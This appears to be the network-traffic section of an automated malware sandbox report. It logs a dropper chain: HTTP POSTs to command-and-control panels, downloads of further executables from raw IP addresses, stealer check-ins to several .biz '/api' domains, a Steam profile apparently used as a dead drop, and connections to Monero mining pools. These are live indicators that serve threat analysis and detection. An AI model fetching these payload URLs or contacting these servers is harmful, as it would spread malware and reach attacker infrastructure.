                            Remote address:
                            188.119.66.185:443
                            Request
                            GET /ai/?key=8f3f2b3ae34f446a2110e0f2231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d305633775b0e650f3ba1e9c95b6d7366bd5f252c480ad1086859254baefb0950502c0d5061cd6352519d0 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                            Host: 188.119.66.185
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 04 Dec 2024 04:22:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.4.33
                          • 185.215.113.43:80
                            http://185.215.113.43/Zu7JuNko/index.php
                            http
                            skotes.exe
                            3.4kB
                            4.2kB
                            26
                            20

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.43/Zu7JuNko/index.php

                            HTTP Response

                            200
                          • 176.113.115.203:80
                            http://176.113.115.203/thebig/stories.exe
                            http
                            skotes.exe
                            90.1kB
                            3.6MB
                            1773
                            2602

                            HTTP Request

                            GET http://176.113.115.203/thebig/stories.exe

                            HTTP Response

                            200
                          • 104.26.12.42:443
                            https://filelu.com/kYVDUI6BhLxQFkmq/UpdatedAgain.cmd
                            tls, http
                            skotes.exe
                            833 B
                            4.4kB
                            10
                            9

                            HTTP Request

                            GET https://filelu.com/kYVDUI6BhLxQFkmq/UpdatedAgain.cmd

                            HTTP Response

                            302
                          • 142.250.200.3:80
                            http://c.pki.goog/r/r4.crl
                            http
                            skotes.exe
                            606 B
                            5.0kB
                            8
                            6

                            HTTP Request

                            GET http://c.pki.goog/r/gsr1.crl

                            HTTP Response

                            200

                            HTTP Request

                            GET http://c.pki.goog/r/r4.crl

                            HTTP Response

                            200
                          • 67.23.237.28:443
                            https://3434.filelu.cloud/d/rj3kav2ljs6ftjtauomnm6xxy62vclfeblizyog7oi6uld2wwwrn5rj2kbk7s4we6vpbwamw/UpdatedAgain.cmd
                            tls, http
                            skotes.exe
                            24.7kB
                            1.1MB
                            502
                            819

                            HTTP Request

                            GET https://3434.filelu.cloud/d/rj3kav2ljs6ftjtauomnm6xxy62vclfeblizyog7oi6uld2wwwrn5rj2kbk7s4we6vpbwamw/UpdatedAgain.cmd

                            HTTP Response

                            200
                          • 88.221.134.89:80
                            http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgS2642r6Dvuq8kP4nfWWv6NOw%3D%3D
                            http
                            skotes.exe
                            475 B
                            1.9kB
                            5
                            4

                            HTTP Request

                            GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgS2642r6Dvuq8kP4nfWWv6NOw%3D%3D

                            HTTP Response

                            200
                          • 185.215.113.16:80
                            http://185.215.113.16/soka/random.exe
                            http
                            skotes.exe
                            102.6kB
                            6.7MB
                            2207
                            4772

                            HTTP Request

                            GET http://185.215.113.16/soka/random.exe

                            HTTP Response

                            200
                          • 185.215.113.16:80
                            http://185.215.113.16/inc/alex2022.exe
                            http
                            axplong.exe
                            157.1kB
                            8.1MB
                            3230
                            5830

                            HTTP Request

                            POST http://185.215.113.16/Jo89Ku7d/index.php

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.16/Jo89Ku7d/index.php

                            HTTP Response

                            200

                            HTTP Request

                            GET http://185.215.113.16/inc/stealc_default2.exe

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.16/Jo89Ku7d/index.php

                            HTTP Response

                            200

                            HTTP Request

                            GET http://185.215.113.16/inc/alex2022.exe

                            HTTP Response

                            200
                          • 31.41.244.11:80
                            http://31.41.244.11/files/rhnew.exe
                            http
                            skotes.exe
                            127.0kB
                            7.9MB
                            2738
                            8322

                            HTTP Request

                            GET http://31.41.244.11/files/7285219295/GI59vO6.exe

                            HTTP Response

                            200

                            HTTP Request

                            GET http://31.41.244.11/files/unique2/random.exe

                            HTTP Request

                            GET http://31.41.244.11/files/martin/random.exe

                            HTTP Request

                            GET http://31.41.244.11/files/rhnew.exe
                          • 185.215.113.17:80
                            http://185.215.113.17/2fb6c2cc8dce150a.php
                            http
                            stealc_default2.exe
                            24.2kB
                            850.3kB
                            377
                            617

                            HTTP Request

                            GET http://185.215.113.17/

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.17/2fb6c2cc8dce150a.php
                          • 185.215.113.36:80
                            axplong.exe
                            328 B
                            40 B
                            7
                            1
                          • 185.215.113.36:80
                            http://185.215.113.36/Dem7kTu/index.php
                            http
                            Gxtuum.exe
                            17.8kB
                            622.4kB
                            286
                            451

                            HTTP Response

                            200

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.36/Dem7kTu/index.php

                            HTTP Request

                            GET http://185.215.113.36/Office2024.exe

                            HTTP Request

                            POST http://185.215.113.36/Dem7kTu/index.php
                          • 95.100.245.144:80
                            http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
                            http
                            393 B
                            1.7kB
                            4
                            4

                            HTTP Request

                            GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

                            HTTP Response

                            200
                          • 2.22.99.85:443
                            steamcommunity.com
                            tls
                            34204cee53.exe
                            624 B
                            4.2kB
                            8
                            8
                          • 95.100.245.144:80
                            www.microsoft.com
                            34204cee53.exe
                            98 B
                            52 B
                            2
                            1
                          • 104.21.82.174:443
                            tls
                            34204cee53.exe
                            860 B
                            9.8kB
                            9
                            14
                          • 92.63.197.221:80
                            http://92.63.197.221/files/download
                            http
                            6158293fba.exe
                            3.3kB
                            59.0kB
                            37
                            52

                            HTTP Response

                            200

                            HTTP Request

                            GET http://92.63.197.221/dll/download

                            HTTP Request

                            GET http://92.63.197.221/files/download
                          • 2.23.210.88:80
                            34204cee53.exe
                            46 B
                            1
                          • 185.215.113.209:80
                            http
                            defnur.exe
                            2.8kB
                            131.8kB
                            56
                            99

                            HTTP Response

                            200
                          • 104.21.43.156:443
                            dare-curbys.biz
                            tls, https
                            v_dolg.exe
                            456 B
                            1.2kB
                            3
                            3
                          • 172.67.162.65:443
                            tls
                            v_dolg.exe
                            46 B
                            1.2kB
                            1
                            2
                          • 104.21.88.210:443
                            https://dwell-exclaim.biz/api
                            tls, http
                            v_dolg.exe
                            935 B
                            4.3kB
                            8
                            9

                            HTTP Request

                            POST https://dwell-exclaim.biz/api

                            HTTP Response

                            200
                          • 34.224.200.202:443
                            tls
                            4305f3e650.exe
                            690 B
                            6.1kB
                            9
                            13
                          • 185.215.113.206:80
                            http://185.215.113.206/c4becf79229cb002.php
                            http
                            a340910d71.exe
                            681 B
                            335 B
                            4
                            3

                            HTTP Request

                            GET http://185.215.113.206/

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.206/c4becf79229cb002.php
                          • 104.21.96.55:443
                            https://formy-spill.biz/api
                            tls, http
                            v_dolg.exe
                            933 B
                            4.3kB
                            8
                            9

                            HTTP Request

                            POST https://formy-spill.biz/api

                            HTTP Response

                            200
                          • 172.67.206.64:443
                            covery-mover.biz
                            tls
                            v_dolg.exe
                            258 B
                            52 B
                            3
                            1
                          • 34.17.28.197:80
                            http
                            4305f3e650.exe
                            73.6kB
                            658 B
                            56
                            13

                            HTTP Response

                            200
                          • 104.21.35.246:443
                            print-vexer.biz
                            v_dolg.exe
                            52 B
                            1
                          • 2.22.99.85:443
                            https://steamcommunity.com/profiles/76561199724331900
                            tls, http
                            v_dolg.exe
                            951 B
                            11.5kB
                            10
                            13

                            HTTP Request

                            GET https://steamcommunity.com/profiles/76561199724331900
                          • 104.21.82.174:443
                            https://marshal-zhukov.com/api
                            tls, http
                            v_dolg.exe
                            1.6kB
                            8.7kB
                            12
                            15

                            HTTP Request

                            POST https://marshal-zhukov.com/api

                            HTTP Response

                            403

                            HTTP Request

                            POST https://marshal-zhukov.com/api
                          • 104.21.16.9:443
                            tls
                            e19e6b7125.exe
                            92 B
                            1.2kB
                            2
                            2
                          • 172.67.162.65:443
                            se-blurry.biz
                            tls
                            e19e6b7125.exe
                            521 B
                            3.0kB
                            6
                            5
                          • 172.67.136.167:443
                            tls
                            e19e6b7125.exe
                            676 B
                            3.1kB
                            5
                            6
                          • 172.67.206.64:443
                            covery-mover.biz
                            tls
                            e19e6b7125.exe
                            722 B
                            4.3kB
                            6
                            8
                          • 104.21.43.156:443
                            https://dare-curbys.biz/api
                            tls, http
                            e19e6b7125.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://dare-curbys.biz/api

                            HTTP Response

                            200
                          • 104.21.16.9:443
                            https://atten-supporse.biz/api
                            tls, http
                            6e7c5374e5.exe
                            982 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://atten-supporse.biz/api

                            HTTP Response

                            200
                          • 104.21.35.246:443
                            https://print-vexer.biz/api
                            tls, http
                            e19e6b7125.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://print-vexer.biz/api

                            HTTP Response

                            200
                          • 172.67.162.65:443
                            https://se-blurry.biz/api
                            tls, http
                            6e7c5374e5.exe
                            973 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://se-blurry.biz/api

                            HTTP Response

                            200
                          • 2.22.99.85:443
                            https://steamcommunity.com/profiles/76561199724331900
                            tls, http
                            e19e6b7125.exe
                            1.5kB
                            42.9kB
                            22
                            37

                            HTTP Request

                            GET https://steamcommunity.com/profiles/76561199724331900

                            HTTP Response

                            200
                          • 172.67.136.167:443
                            https://zinc-sneark.biz/api
                            tls, http
                            6e7c5374e5.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://zinc-sneark.biz/api

                            HTTP Response

                            200
                          • 104.21.82.174:443
                            https://marshal-zhukov.com/api
                            tls, http
                            e19e6b7125.exe
                            1.7kB
                            10.0kB
                            15
                            18

                            HTTP Request

                            POST https://marshal-zhukov.com/api

                            HTTP Response

                            403

                            HTTP Request

                            POST https://marshal-zhukov.com/api

                            HTTP Response

                            200
                          • 104.21.88.210:443
                            https://dwell-exclaim.biz/api
                            tls, http
                            6e7c5374e5.exe
                            977 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://dwell-exclaim.biz/api

                            HTTP Response

                            200
                          • 34.17.28.197:80
                            http://home.fvtekx5vs.top/vxXfqWNjhpDBdpAIgFUP1733139437?argument=0
                            http
                            4305f3e650.exe
                            328 B
                            525 B
                            5
                            4

                            HTTP Request

                            GET http://home.fvtekx5vs.top/vxXfqWNjhpDBdpAIgFUP1733139437?argument=0

                            HTTP Response

                            404
                          • 104.21.88.210:443
                            dwell-exclaim.biz
                            e19e6b7125.exe
                            46 B
                            1
                          • 104.21.96.55:443
                            formy-spill.biz
                            e19e6b7125.exe
                            46 B
                            1
                          • 104.21.96.55:443
                            https://formy-spill.biz/api
                            tls, http
                            6e7c5374e5.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://formy-spill.biz/api

                            HTTP Response

                            200
                          • 34.17.28.197:80
                            http://home.fvtekx5vs.top/vxXfqWNjhpDBdpAIgFUP1733139437
                            http
                            4305f3e650.exe
                            401 B
                            525 B
                            5
                            4

                            HTTP Request

                            POST http://home.fvtekx5vs.top/vxXfqWNjhpDBdpAIgFUP1733139437

                            HTTP Response

                            404
                          • 172.67.206.64:443
                            https://covery-mover.biz/api
                            tls, http
                            6e7c5374e5.exe
                            980 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://covery-mover.biz/api

                            HTTP Response

                            200
                          • 185.215.113.206:80
                            http://185.215.113.206/c4becf79229cb002.php
                            http
                            bb34fd4a66.exe
                            727 B
                            625 B
                            5
                            5

                            HTTP Request

                            GET http://185.215.113.206/

                            HTTP Response

                            200

                            HTTP Request

                            POST http://185.215.113.206/c4becf79229cb002.php

                            HTTP Response

                            200
                          • 104.21.43.156:443
                            https://dare-curbys.biz/api
                            tls, http
                            6e7c5374e5.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://dare-curbys.biz/api

                            HTTP Response

                            200
                          • 104.21.35.246:443
                            https://print-vexer.biz/api
                            tls, http
                            6e7c5374e5.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://print-vexer.biz/api

                            HTTP Response

                            200
                          • 2.22.99.85:443
                            https://steamcommunity.com/profiles/76561199724331900
                            tls, http
                            6e7c5374e5.exe
                            1.5kB
                            42.9kB
                            21
                            36

                            HTTP Request

                            GET https://steamcommunity.com/profiles/76561199724331900

                            HTTP Response

                            200
                          • 104.21.82.174:443
                            https://marshal-zhukov.com/api
                            tls, http
                            6e7c5374e5.exe
                            1.7kB
                            10.0kB
                            15
                            18

                            HTTP Request

                            POST https://marshal-zhukov.com/api

                            HTTP Response

                            403

                            HTTP Request

                            POST https://marshal-zhukov.com/api

                            HTTP Response

                            200
                          • 185.215.113.209:80
                            http://185.215.113.209/Fru7Nk9/index.php
                            http
                            rundll32.exe
                            439 B
                            1.6kB
                            6
                            5

                            HTTP Request

                            POST http://185.215.113.209/Fru7Nk9/index.php

                            HTTP Response

                            200
                          • 2.22.99.85:443
                            https://steamcommunity.com/profiles/76561199724331900
                            tls, http
                            GI59vO6.exe
                            1.3kB
                            33.0kB
                            18
                            29

                            HTTP Request

                            GET https://steamcommunity.com/profiles/76561199724331900

                            HTTP Response

                            200
                          • 172.217.169.78:443
                            https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                            tls, http2
                            firefox.exe
                            1.9kB
                            8.9kB
                            14
                            17

                            HTTP Request

                            GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          • 34.120.5.221:443
                            https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                            tls, http2
                            firefox.exe
                            1.9kB
                            12.7kB
                            15
                            19

                            HTTP Request

                            GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                          • 142.250.178.14:443
                            www.youtube.com
                            tls
                            firefox.exe
                            977 B
                            6.9kB
                            10
                            8
                          • 34.117.121.53:443
                            firefox-settings-attachments.cdn.mozilla.net
                            tls
                            firefox.exe
                            1.7kB
                            21.3kB
                            18
                            26
                          • 216.58.201.110:443
                            https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                            tls, http2
                            firefox.exe
                            3.1kB
                            64.9kB
                            36
                            58

                            HTTP Request

                            GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                          • 172.217.16.228:443
                            https://www.google.com/favicon.ico
                            tls, http2
                            firefox.exe
                            1.8kB
                            7.5kB
                            14
                            18

                            HTTP Request

                            GET https://www.google.com/favicon.ico
                          • 172.67.136.167:443
                            v_dolg.exe
                          • 104.21.43.156:443
                            https://dare-curbys.biz/api
                            tls, http
                            rhnew.exe
                            1.4kB
                            5.6kB
                            12
                            12

                            HTTP Request

                            POST https://dare-curbys.biz/api

                            HTTP Response

                            200

                            HTTP Request

                            POST https://dare-curbys.biz/api

                            HTTP Response

                            200
                          • 172.67.162.65:443
                            https://se-blurry.biz/api
                            tls, http
                            rhnew.exe
                            977 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://se-blurry.biz/api

                            HTTP Response

                            200
                          • 172.67.136.167:443
                            https://zinc-sneark.biz/api
                            tls, http
                            rhnew.exe
                            975 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://zinc-sneark.biz/api

                            HTTP Response

                            200
                          • 104.21.88.210:443
                            https://dwell-exclaim.biz/api
                            tls, http
                            rhnew.exe
                            981 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://dwell-exclaim.biz/api

                            HTTP Response

                            200
                          • 104.21.96.55:443
                            https://formy-spill.biz/api
                            tls, http
                            rhnew.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://formy-spill.biz/api

                            HTTP Response

                            200
                          • 172.67.206.64:443
                            https://covery-mover.biz/api
                            tls, http
                            rhnew.exe
                            976 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://covery-mover.biz/api

                            HTTP Response

                            200
                          • 51.15.61.114:10343
                            xmr-eu2.nanopool.org
                            tls
                            cmd.exe
                            1.4kB
                            3.3kB
                            9
                            8
                          • 104.21.35.246:443
                            https://print-vexer.biz/api
                            tls, http
                            rhnew.exe
                            979 B
                            4.3kB
                            9
                            9

                            HTTP Request

                            POST https://print-vexer.biz/api

                            HTTP Response

                            200
                          • 2.22.99.85:443
                            https://steamcommunity.com/profiles/76561199724331900
                            tls, http
                            rhnew.exe
                            1.2kB
                            33.0kB
                            15
                            30

                            HTTP Request

                            GET https://steamcommunity.com/profiles/76561199724331900

                            HTTP Response

                            200
                          • 104.20.4.235:443
                            pastebin.com
                            tls
                            cmd.exe
                            996 B
                            6.2kB
                            10
                            11
                          • 127.0.0.1:49837
                            firefox.exe
                          • 127.0.0.1:49843
                            firefox.exe
                          • 54.37.137.114:14433
                            xmr-eu1.nanopool.org
                            tls
                            cmd.exe
                            1.6kB
                            5.3kB
                            13
                            12
                          • 92.63.197.221:80
                            http://92.63.197.221/files/download
                            http
                            6158293fba.exe
                            2.1kB
                            1.2kB
                            11
                            9

                            HTTP Request

                            GET http://92.63.197.221/files/download

                            HTTP Response

                            200

                            HTTP Request

                            GET http://92.63.197.221/files/download

                            HTTP Response

                            200

                            HTTP Request

                            GET http://92.63.197.221/files/download

                            HTTP Response

                            200

                            HTTP Request

                            GET http://92.63.197.221/files/download
                          • 88.221.134.209:80
                            http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                            http
                            firefox.exe
                            7.9kB
                            467.4kB
                            164
                            343

                            HTTP Request

                            GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                            HTTP Response

                            200
                          • 172.217.169.46:443
                            redirector.gvt1.com
                            tls
                            firefox.exe
                            1.6kB
                            8.9kB
                            17
                            21
                          • 173.194.182.73:443
                            r4---sn-4g5e6ns7.gvt1.com
                            tls
                            firefox.exe
                            226.7kB
                            9.5MB
                            3523
                            6795
                          • 142.250.187.206:443
                            https://play.google.com/log?hasfast=true&authuser=0&format=json
                            tls, http2
                            firefox.exe
                            2.7kB
                            8.7kB
                            16
                            19

                            HTTP Request

                            POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                          • 92.63.197.221:80
                            http://92.63.197.221/soft/download
                            http
                            6158293fba.exe
                            19.8kB
                            1.8MB
                            406
                            1296

                            HTTP Request

                            GET http://92.63.197.221/files/download

                            HTTP Response

                            200

                            HTTP Request

                            GET http://92.63.197.221/soft/download

                            HTTP Response

                            200

                            HTTP Request

                            GET http://92.63.197.221/soft/download

                            HTTP Response

                            200
                          • 216.58.201.110:443
                            consent.youtube.com
                            tls
                            firefox.exe
                            1.3kB
                            1.2kB
                            8
                            8
                          • 188.119.66.185:443
                            https://188.119.66.185/ai/?key=8f3f2b3ae34f446a2110e0f2231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d305633775b0e650f3ba1e9c95b6d7366bd5f252c480ad1086859254baefb0950502c0d5061cd6352519d0
                            tls, http
                            videojet3264.exe
                            1.2kB
                            7.4kB
                            11
                            13

                            HTTP Request

                            GET https://188.119.66.185/ai/?key=8f3f2b3ae34f446a2110e0f2231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d305633775b0e650f3ba1e9c95b6d7366bd5f252c480ad1086859254baefb0950502c0d5061cd6352519d0

                            HTTP Response

                            200
                          • 8.8.8.8:53
                            filelu.com
                            dns
                            skotes.exe
                            56 B
                            104 B
                            1
                            1

                            DNS Request

                            filelu.com

                            DNS Response

                            104.26.12.42
                            104.26.13.42
                            172.67.68.204

                          • 8.8.8.8:53
                            c.pki.goog
                            dns
                            skotes.exe
                            56 B
                            107 B
                            1
                            1

                            DNS Request

                            c.pki.goog

                            DNS Response

                            142.250.200.3

                          • 8.8.8.8:53
                            3434.filelu.cloud
                            dns
                            skotes.exe
                            63 B
                            79 B
                            1
                            1

                            DNS Request

                            3434.filelu.cloud

                            DNS Response

                            67.23.237.28

                          • 8.8.8.8:53
                            r11.o.lencr.org
                            dns
                            skotes.exe
                            61 B
                            160 B
                            1
                            1

                            DNS Request

                            r11.o.lencr.org

                            DNS Response

                            88.221.134.89
                            88.221.134.137

                          • 8.8.8.8:53
                            thicktoys.sbs
                            dns
                            34204cee53.exe
                            59 B
                            124 B
                            1
                            1

                            DNS Request

                            thicktoys.sbs

                          • 8.8.8.8:53
                            dns
                            127 B
                            1
                          • 8.8.8.8:53
                            3xc1aimbl0w.sbs
                            dns
                            34204cee53.exe
                            61 B
                            1

                            DNS Request

                            3xc1aimbl0w.sbs

                          • 8.8.8.8:53
                            bored-light.sbs
                            dns
                            34204cee53.exe
                            61 B
                            126 B
                            1
                            1

                            DNS Request

                            bored-light.sbs

                          • 8.8.8.8:53
                            300snails.sbs
                            dns
                            34204cee53.exe
                            59 B
                            124 B
                            1
                            1

                            DNS Request

                            300snails.sbs

                          • 8.8.8.8:53
                            www.microsoft.com
                            dns
                            34204cee53.exe
                            63 B
                            230 B
                            1
                            1

                            DNS Request

                            www.microsoft.com

                            DNS Response

                            95.100.245.144

                          • 8.8.8.8:53
                            faintbl0w.sbs
                            dns
                            34204cee53.exe
                            59 B
                            124 B
                            1
                            1

                            DNS Request

                            faintbl0w.sbs

                          • 8.8.8.8:53
                            home.sevkk17vt.top
                            dns
                            trru7rd2.exe
                            174 B
                            290 B
                            2
                            2

                            DNS Request

                            home.sevkk17vt.top

                            DNS Request

                            home.sevkk17vt.top

                          • 8.8.8.8:53
                            crib-endanger.sbs
                            dns
                            34204cee53.exe
                            63 B
                            128 B
                            1
                            1

                            DNS Request

                            crib-endanger.sbs

                          • 8.8.8.8:53
                            steamcommunity.com
                            dns
                            rhnew.exe
                            64 B
                            80 B
                            1
                            1

                            DNS Request

                            steamcommunity.com

                            DNS Response

                            2.22.99.85

                          • 8.8.8.8:53
                            dare-curbys.biz
                            dns
                            rhnew.exe
                            61 B
                            93 B
                            1
                            1

                            DNS Request

                            dare-curbys.biz

                            DNS Response

                            104.21.43.156
                            172.67.181.44

                          • 8.8.8.8:53
                            zinc-sneark.biz
                            dns
                            rhnew.exe
                            61 B
                            1

                            DNS Request

                            zinc-sneark.biz

                          • 8.8.8.8:53
                            dns
                            95 B
                            1

                            DNS Response

                            104.21.88.210
                            172.67.153.96

                          • 8.8.8.8:53
                            formy-spill.biz
                            dns
                            rhnew.exe
                            61 B
                            93 B
                            1
                            1

                            DNS Request

                            formy-spill.biz

                            DNS Response

                            104.21.96.55
                            172.67.173.74

                          • 8.8.8.8:53
                            covery-mover.biz
                            dns
                            rhnew.exe
                            62 B
                            94 B
                            1
                            1

                            DNS Request

                            covery-mover.biz

                            DNS Response

                            172.67.206.64
                            104.21.58.186

                          • 8.8.8.8:53
                            home.fvtekx5vs.top
                            dns
                            4305f3e650.exe
                            174 B
                            135 B
                            2
                            1

                            DNS Request

                            home.fvtekx5vs.top

                            DNS Request

                            home.fvtekx5vs.top

                          • 8.8.8.8:53
                            print-vexer.biz
                            dns
                            rhnew.exe
                            61 B
                            93 B
                            1
                            1

                            DNS Request

                            print-vexer.biz

                            DNS Response

                            104.21.35.246
                            172.67.181.192

                          • 8.8.8.8:53
                            impend-differ.biz
                            dns
                            rhnew.exe
                            63 B
                            125 B
                            1
                            1

                            DNS Request

                            impend-differ.biz

                          • 8.8.8.8:53
                            atten-supporse.biz
                            dns
                            6e7c5374e5.exe
                            64 B
                            1

                            DNS Request

                            atten-supporse.biz

                          • 8.8.8.8:53
                            se-blurry.biz
                            dns
                            rhnew.exe
                            59 B
                            91 B
                            1
                            1

                            DNS Request

                            se-blurry.biz

                            DNS Response

                            172.67.162.65
                            104.21.81.153

                          • 8.8.8.8:53
                            home.fvtekx5vs.top
                            dns
                            4305f3e650.exe
                            174 B
                            226 B
                            2
                            2

                            DNS Request

                            home.fvtekx5vs.top

                            DNS Request

                            home.fvtekx5vs.top

                            DNS Response

                            34.17.28.197

                          • 8.8.8.8:53
                            home.fvtekx5vs.top
                            dns
                            4305f3e650.exe
                            174 B
                            226 B
                            2
                            2

                            DNS Request

                            home.fvtekx5vs.top

                            DNS Request

                            home.fvtekx5vs.top

                            DNS Response

                            34.17.28.197

                          • 8.8.8.8:53
                            salve-windp.cyou
                            dns
                            GI59vO6.exe
                            62 B
                            127 B
                            1
                            1

                            DNS Request

                            salve-windp.cyou

                          • 8.8.8.8:53
                            frogs-severz.sbs
                            dns
                            GI59vO6.exe
                            62 B
                            127 B
                            1
                            1

                            DNS Request

                            frogs-severz.sbs

                          • 8.8.8.8:53
                            occupy-blushi.sbs
                            dns
                            GI59vO6.exe
                            63 B
                            128 B
                            1
                            1

                            DNS Request

                            occupy-blushi.sbs

                          • 8.8.8.8:53
                            blade-govern.sbs
                            dns
                            GI59vO6.exe
                            62 B
                            127 B
                            1
                            1

                            DNS Request

                            blade-govern.sbs

                          • 8.8.8.8:53
                            story-tense-faz.sbs
                            dns
                            GI59vO6.exe
                            65 B
                            130 B
                            1
                            1

                            DNS Request

                            story-tense-faz.sbs

                          • 8.8.8.8:53
                            leg-sate-boat.sbs
                            dns
                            GI59vO6.exe
                            63 B
                            128 B
                            1
                            1

                            DNS Request

                            leg-sate-boat.sbs

                          • 8.8.8.8:53
                            disobey-curly.sbs
                            dns
                            GI59vO6.exe
                            63 B
                            128 B
                            1
                            1

                            DNS Request

                            disobey-curly.sbs

                          • 8.8.8.8:53
                            motion-treesz.sbs
                            dns
                            GI59vO6.exe
                            63 B
                            128 B
                            1
                            1

                            DNS Request

                            motion-treesz.sbs

                          • 8.8.8.8:53
                            powerful-avoids.sbs
                            dns
                            GI59vO6.exe
                            65 B
                            130 B
                            1
                            1

                            DNS Request

                            powerful-avoids.sbs

                          • 8.8.8.8:53
                            youtube.com
                            dns
                            firefox.exe
                            57 B
                            73 B
                            1
                            1

                            DNS Request

                            youtube.com

                            DNS Response

                            172.217.169.78

                          • 8.8.8.8:53
                            spocs.getpocket.com
                            dns
                            firefox.exe
                            65 B
                            131 B
                            1
                            1

                            DNS Request

                            spocs.getpocket.com

                            DNS Response

                            34.117.188.166

                          • 8.8.8.8:53
                            getpocket.cdn.mozilla.net
                            dns
                            firefox.exe
                            71 B
                            174 B
                            1
                            1

                            DNS Request

                            getpocket.cdn.mozilla.net

                            DNS Response

                            34.120.5.221

                          • 8.8.8.8:53
                            youtube.com
                            dns
                            firefox.exe
                            57 B
                            73 B
                            1
                            1

                            DNS Request

                            youtube.com

                            DNS Response

                            172.217.169.78

                          • 8.8.8.8:53
                            prod.ads.prod.webservices.mozgcp.net
                            dns
                            firefox.exe
                            82 B
                            98 B
                            1
                            1

                            DNS Request

                            prod.ads.prod.webservices.mozgcp.net

                            DNS Response

                            34.117.188.166

                          • 8.8.8.8:53
                            youtube.com
                            dns
                            firefox.exe
                            57 B
                            85 B
                            1
                            1

                            DNS Request

                            youtube.com

                            DNS Response

                            2a00:1450:4009:819::200e

                          • 8.8.8.8:53
                            prod.ads.prod.webservices.mozgcp.net
                            dns
                            firefox.exe
                            82 B
                            175 B
                            1
                            1

                            DNS Request

                            prod.ads.prod.webservices.mozgcp.net

                          • 8.8.8.8:53
                            prod.pocket.prod.cloudops.mozgcp.net
                            dns
                            firefox.exe
                            82 B
                            98 B
                            1
                            1

                            DNS Request

                            prod.pocket.prod.cloudops.mozgcp.net

                            DNS Response

                            34.120.5.221

                          • 8.8.8.8:53
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            dns
                            firefox.exe
                            103 B
                            119 B
                            1
                            1

                            DNS Request

                            prod.content-signature-chains.prod.webservices.mozgcp.net

                            DNS Response

                            34.160.144.191

                          • 8.8.8.8:53
                            shavar.prod.mozaws.net
                            dns
                            firefox.exe
                            68 B
                            116 B
                            1
                            1

                            DNS Request

                            shavar.prod.mozaws.net

                            DNS Response

                            44.226.106.83
                            52.32.237.164
                            54.149.231.17

                          • 8.8.8.8:53
                            prod.content-signature-chains.prod.webservices.mozgcp.net
                            dns
                            firefox.exe
                            103 B
                            131 B
                            1
                            1

                            DNS Request

                            prod.content-signature-chains.prod.webservices.mozgcp.net

